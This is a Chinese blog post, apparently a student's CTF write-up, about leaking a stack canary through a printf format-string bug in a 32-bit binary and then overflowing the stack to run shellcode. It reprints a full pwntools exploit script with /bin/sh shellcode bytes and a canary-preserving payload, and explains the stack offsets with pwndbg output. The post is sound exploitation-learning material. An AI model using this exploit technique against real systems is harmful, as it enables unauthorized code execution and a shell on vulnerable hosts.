夏令营7.23reverse(逆向)--格式化字符串泄露canary

最新推荐文章于 2022-01-12 11:12:28 发布
最新推荐文章于 2022-01-12 11:12:28 发布
阅读量384 收藏
点赞数 1
分类专栏: 做题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MIGENGKING/article/details/97419272
版权

解题思路:
1、可以利用printf函数泄露出canary的值,然后利用栈溢出填充canary,控制返回指针执行getshell函数。
2、用格式化字符串漏洞泄露运行的函数,计算出来system,/bin/sh的真实地址。用格式化字符串漏洞写入数据到返回地址。
3、格式化字符串,也是一种比较常见的漏洞类型。会触发该漏洞的函数很有限。主要就是printf还有sprintf,fprintf等等c库中print家族的函数。
4、anary主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的。
Stack canary保护机制在刚进入函数时,在栈上放置一个标志canary,然后 在函数结束时,判断该标志是否被改变,如果被改变,则表示有攻击行为发生。

工具:ubuntu虚拟机

解题过程:

1):
把题目放进ubuntu虚拟机分析题目:

在这里插入图片描述

题目是Arch模式是32位的,stack(栈)发现有canary保护机制,然后NX关闭。
2) :
接着把题目放进IDAx32位分析源程序:

在这里插入图片描述
在这里插入图片描述
因为在C语言中,print()输出函数要指定输出的类型;
源程序中的并没有指定输出类型,因此存在字符串canary漏洞。

3):
知道函数存在字符串漏洞,然后在ubuntu虚拟机中调试程序:

在这里插入图片描述
在这里插入图片描述
为什么要插入断点呢?

断点的地址是泄露函数的地址:这里指的是在主函数main()中的get_massage函数的地址:

在这里插入图片描述
在这里插入图片描述

因为还不怎么才开始学不懂写脚本,只能先分析人家的脚本:

这是题目的脚本:

from pwn import *

shellcode="\x31\xc0\x31\xd2\x31\xdb\x31\xc9\x31\xc0\x31\xd2\x52\x68\x2f\x2f"
“\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0”
“\x0b\xcd\x80\n”
context.log_level=‘debug’
p=process("./pwn1")
#p=remote(‘172.16.80.240’,8000)

#########################leak canary,prev_ebp_addr################
p.recvuntil(‘name:’)
p.sendline(’%p.’*40)
leak_data=p.recvuntil(‘messages:’)
address=leak_data.split(’.’)
for i in range(len(address)):
print str(i)+WA’:’+str(address[i])
canary=address[30]
print “canary=”+canary
prev_ebp_addr=address[33]
print “stack_addr=”+prev_ebp_addr

#########################get shellcode_addr########################
shellcode_addr=int(prev_ebp_addr,16)-144+0x8

#########################send shellcode and get shell##############
payload=‘a’*100+p32(int(canary,16))+‘A’*12+p32(shellcode_addr)+shellcode
p.sendline(payload)
p.interactive()

分析脚本:
很多的内容和我写上几篇pwn的level题的思路一样,这里就不详述,
将关键的就好:

1)“p.sendline(’%p.’*40)”指的是发送一个长度为40的字符串,其实这里40 可以任意

2)“canary=address[30]”:

30是指canary的地址长度,这么来的?
(栈顶esp到栈底之前,输入姓名的地址还有返回参数的地址)

栈图:

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

0x246e00是返回参数的地址,也就是“111111”是刚才输入名字的地址,
计算长度:
在这里插入图片描述
在这里插入图片描述
一个字符串四个字节124/3=31(0~30)

3)“prev_ebp_addr=address[33]”
33是指栈底地址长度(栈顶和栈底之间的地址之间的距离):

在这里插入图片描述

在这里插入图片描述

pwndbg> distance 0xffffcec8 0xffffce40
0xffffcec8->0xffffce40 is -0x88 bytes (-0x22 words)

int (0x88)
136

136/4
34(0~33)

4)“shellcode_addr=int(prev_ebp_addr,16)-144+0x8”

144(栈底ebp的真实地址和虚拟地址之间的距离)怎么来的?

在这里插入图片描述
在这里插入图片描述
pwndbg> distance 0xffffcf58 0xffffcec8
0xffffcf58->0xffffcec8 is -0x90 bytes (-0x24 words)

int(0x90)
144

5)“12”(姓名参数的返回地址和栈底ebp的地址):

pwndbg> distance 0xffffcec8 0xffffcebc
0xffffcec8->0xffffcebc is -0xc bytes (-0x3 words)

int(0xc)
12

6)“payload=‘a’*100+p32(int(canary,16))+‘A’*12+p32(shellcode_addr)+shellcode”
“100”(栈底esp之前的canary的内存到100)

MIGENGKING
关注
专栏目录
字符串逆序-使用C#实现的字符串逆序.zip
03-21
上述代码首先通过`ToCharArray()`方法将字符串转化为字符数组,然后使用`Array.Reverse(chars)`进行逆序,最后通过`new string(chars)`将字符数组转换回字符串。 除了使用`Array.Reverse()`,还可以使用C#的字符串...
reverse-words:反转给定字符串中的单词 (http
07-14
本项目“reverse-words”聚焦于一个特定的字符串处理任务:反转给定字符串中的单词顺序。这个任务在很多实际应用场景中都有可能出现,比如文本处理、数据清洗或算法挑战等。 首先,我们要理解什么是“反转给定字符...
格式化字符串漏洞泄露StackCanary
ACdream
04-26 3083
2017陕西省的pwn_box这个题作为调试的程序,gdb作为工具 先来熟悉原理,推荐几个pdf学习懂原理吧: Format String Exploitation-Tutorial By Saif El-Sherei Exploiting Format String Vulnerabilities  scut/team teso 看完这几个会对原理有深刻认识,然后如何操作呢? 戳我
格式化字符串绕过canary入门
蚁景网安学院
11-26 443
知识格式化字符串漏洞是因为c语言中printf的参数个数不是确定的,参数的长度也不是确定的,当printf把我们的输入当作第一个参数直接输出的时候,我们输入若干格式化字符串,会增加与格式...
格式化字符漏洞 tamuCTF pwn3 writeup
charlie_heng的专栏
06-05 1050
之前一直不怎么会格式化字符串的漏洞,刚好碰上这道题,学习一波首先看下main函数,读一个字符串,然后打印出来,之后直接exit(0) 无法利用栈溢出跳转,但是prinf是直接打印读取的东西,这里就存在一个格式化字符串漏洞。 这里推荐一个格式化字符串漏洞入门的教程: http://codearcana.com/posts/2013/05/02/introduction-to-format-stri
逆向培训2——基础题
m0_62504956的博客
01-12 175
1.搜索 main函数 找到相关位置 通过F5进行反编译 2.发现一串可疑数字 "*11110100001010000101111#" 接着分析代码 发现当遇到1时 程序会异常退出 遇到#时会输出获得flag并正常退出 (已将十进制的49转化为字符‘1’ , 35转化为‘#’) 于是我们该思考如何不走1 结合迷宫和上下左右移动的提示 我们可以构造出一个迷宫通过上下左右的方法避开1来到末尾的'#'位置。 3.我们观察可知数字一共有23个 加上开始的'*'和末尾的‘#’ 一共是25个 我们.
字符串反转
chenchw的博客
08-10 1424
1、将字符串反转 String 是一种不可变字符串,一对字符串进行改变操作,则创建一个全新的对象,然后把引用指向这个新的对象。 package enumeration; public class HomeWork { public static void main(String[] args) { String str = "abcdefg"; str = Me.reverse(str,0,3); System.out.println(s
the-string-reverse-by-C-Language.rar_反转字符串_指针和字符串
09-21
在C语言中,字符串是由字符组成的数组,通常以空字符'\0'作为结束标识。反转字符串是一种常见的编程任务,可以通过多种方法实现,其中包括使用指针。在这个项目中,我们将探讨如何通过C语言来反转字符串,重点是理解...
字符串逆序-使用Java实现的字符串按单词逆序.zip
03-21
在IT领域,字符串处理是日常编程任务中常见的一部分。这里我们关注的是如何使用Java来实现一个特定的功能:字符串按单词逆序。这个功能涉及到对字符串的解析、分割以及重新组合,是字符串操作的一个典型实例。 首先...
字符串逆序-使用C语言实现的字符串按单词逆序.zip
03-21
在编程领域,字符串逆序是一种常见的操作,尤其在C语言中,由于其底层特性,处理字符串需要更加细致。本主题将深入探讨如何使用C语言来实现一个字符串逆序的程序,特别是按照单词进行逆序,这在处理文本数据时非常...
【Android 逆向】IDA 工具使用 ( IDA 32 位 / 64 位 版本 | 汇编代码视图 IDA View-A | 字符串窗口 Strings window )
让 学习 成为一种 习惯 ( 韩曙亮 の 技术博客 )
10-13 9285
一、IDA 32 位 / 64 位 版本、 二、汇编代码视图 IDA View-A、 三、字符串窗口 Strings window、
Canary机制及绕过策略
helloworlddm的博客
06-14 3456
Canary机制 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段(只是缓解机制,不能彻底的阻止),当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让 shellcode
BUGKU-逆向(reverse)-writeup
weixin_30371469的博客
12-04 958
目录 入门逆向 Easy_vb Easy_Re 游戏过关 Timer(阿里CTF) 逆向入门 love LoopAndLoop(阿里CTF) easy-100(LCTF) SafeBox(NJCTF) ...
system( )用法陷阱
06-29 483
system()这个接口的本质是调用sh来fork出一个进程来执行传进去的命令,如果传进去一个切换目录的命令cd,  这个命令切换是发生在新进程当中,和当前的进程没有半毛钱关系,这个得注意下,在程序中切换目录还是用chdir( )函数接口吧。
一个超简单的反编译任务(IDAPro、X32dbg)
一个手掰橙的博客
12-01 7002
一个超简单的反汇编任务 所需工具 IDAPro、X32dbg、Visual C++ 6.0 实验步骤 首先,我们新建一个简单的程序并编译运行。 这里笔者建立了一个弹窗程序,运行结果如下: 进行IDA逆向分析,我们可以通过空格键来切换视图,这时可以看到HelloWorld这部分的地址为00401031 在X32dbg中打开test_hello.exe后,找到目标地址 同时在转储中跟随 这时我们可以对“Hello,world!”进行编辑更改 接下来生成补丁文件并保存 此时打开新文件soe
绕过canary原理及其利用方式
glhdbk的博客
09-07 4342
canary简介: canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_chk_fail函数,继而终止程序。 所以如果有一道题开启了canary...
格式化字符串泄露
tianxi blog's
05-04 451
got表地址 如果要通过格式化字符串泄露出某个函数的got表地址,需要使用格式化字符串来打印出来,而不能去直接通过: puts_got = elf.got['puts'] 把 puts_got 当做参数传到: libc = LibcSearcher('puts',puts_addr) 去查找 libc,因为 elf.got 获取的是 puts 函数的 got 地址表地址,而不是 got ...
190Reverse Bits反转二进制字节
lMonster81
10-15 248
颠倒给定的 32 位无符号整数的二进制位。 示例: 输入: 43261596 输出: 964176192 解释: 43261596 的二进制表示形式为 00000010100101000001111010011100 ,   返回 964176192,其二进制表示形式为 00111001011110000010100101000000 。 进阶: 如果多次调用这个函数,你将如何优化你的算法...
格式化字符串泄露canary到栈溢出
SsMing的博客
01-11 4351
以ASIS-CTF-Finals-2017 Mary_Morton为例 checksec查看,开了NX保护,还有canary IDA打开 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { const char *v3; // rdi int v4; // [rsp+24h] [rbp-Ch] ...
使用reverse-string函数实现数组字符串中的字符逆向排序
最新发布
09-29
在许多编程语言中,你可以使用内置的`reverse()`函数或类似方法来实现数组(列表)中字符串字符的逆向排序。这里我会以JavaScript为例说明: ```javascript function reverseStringInArray(arr) { // 遍历数组中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值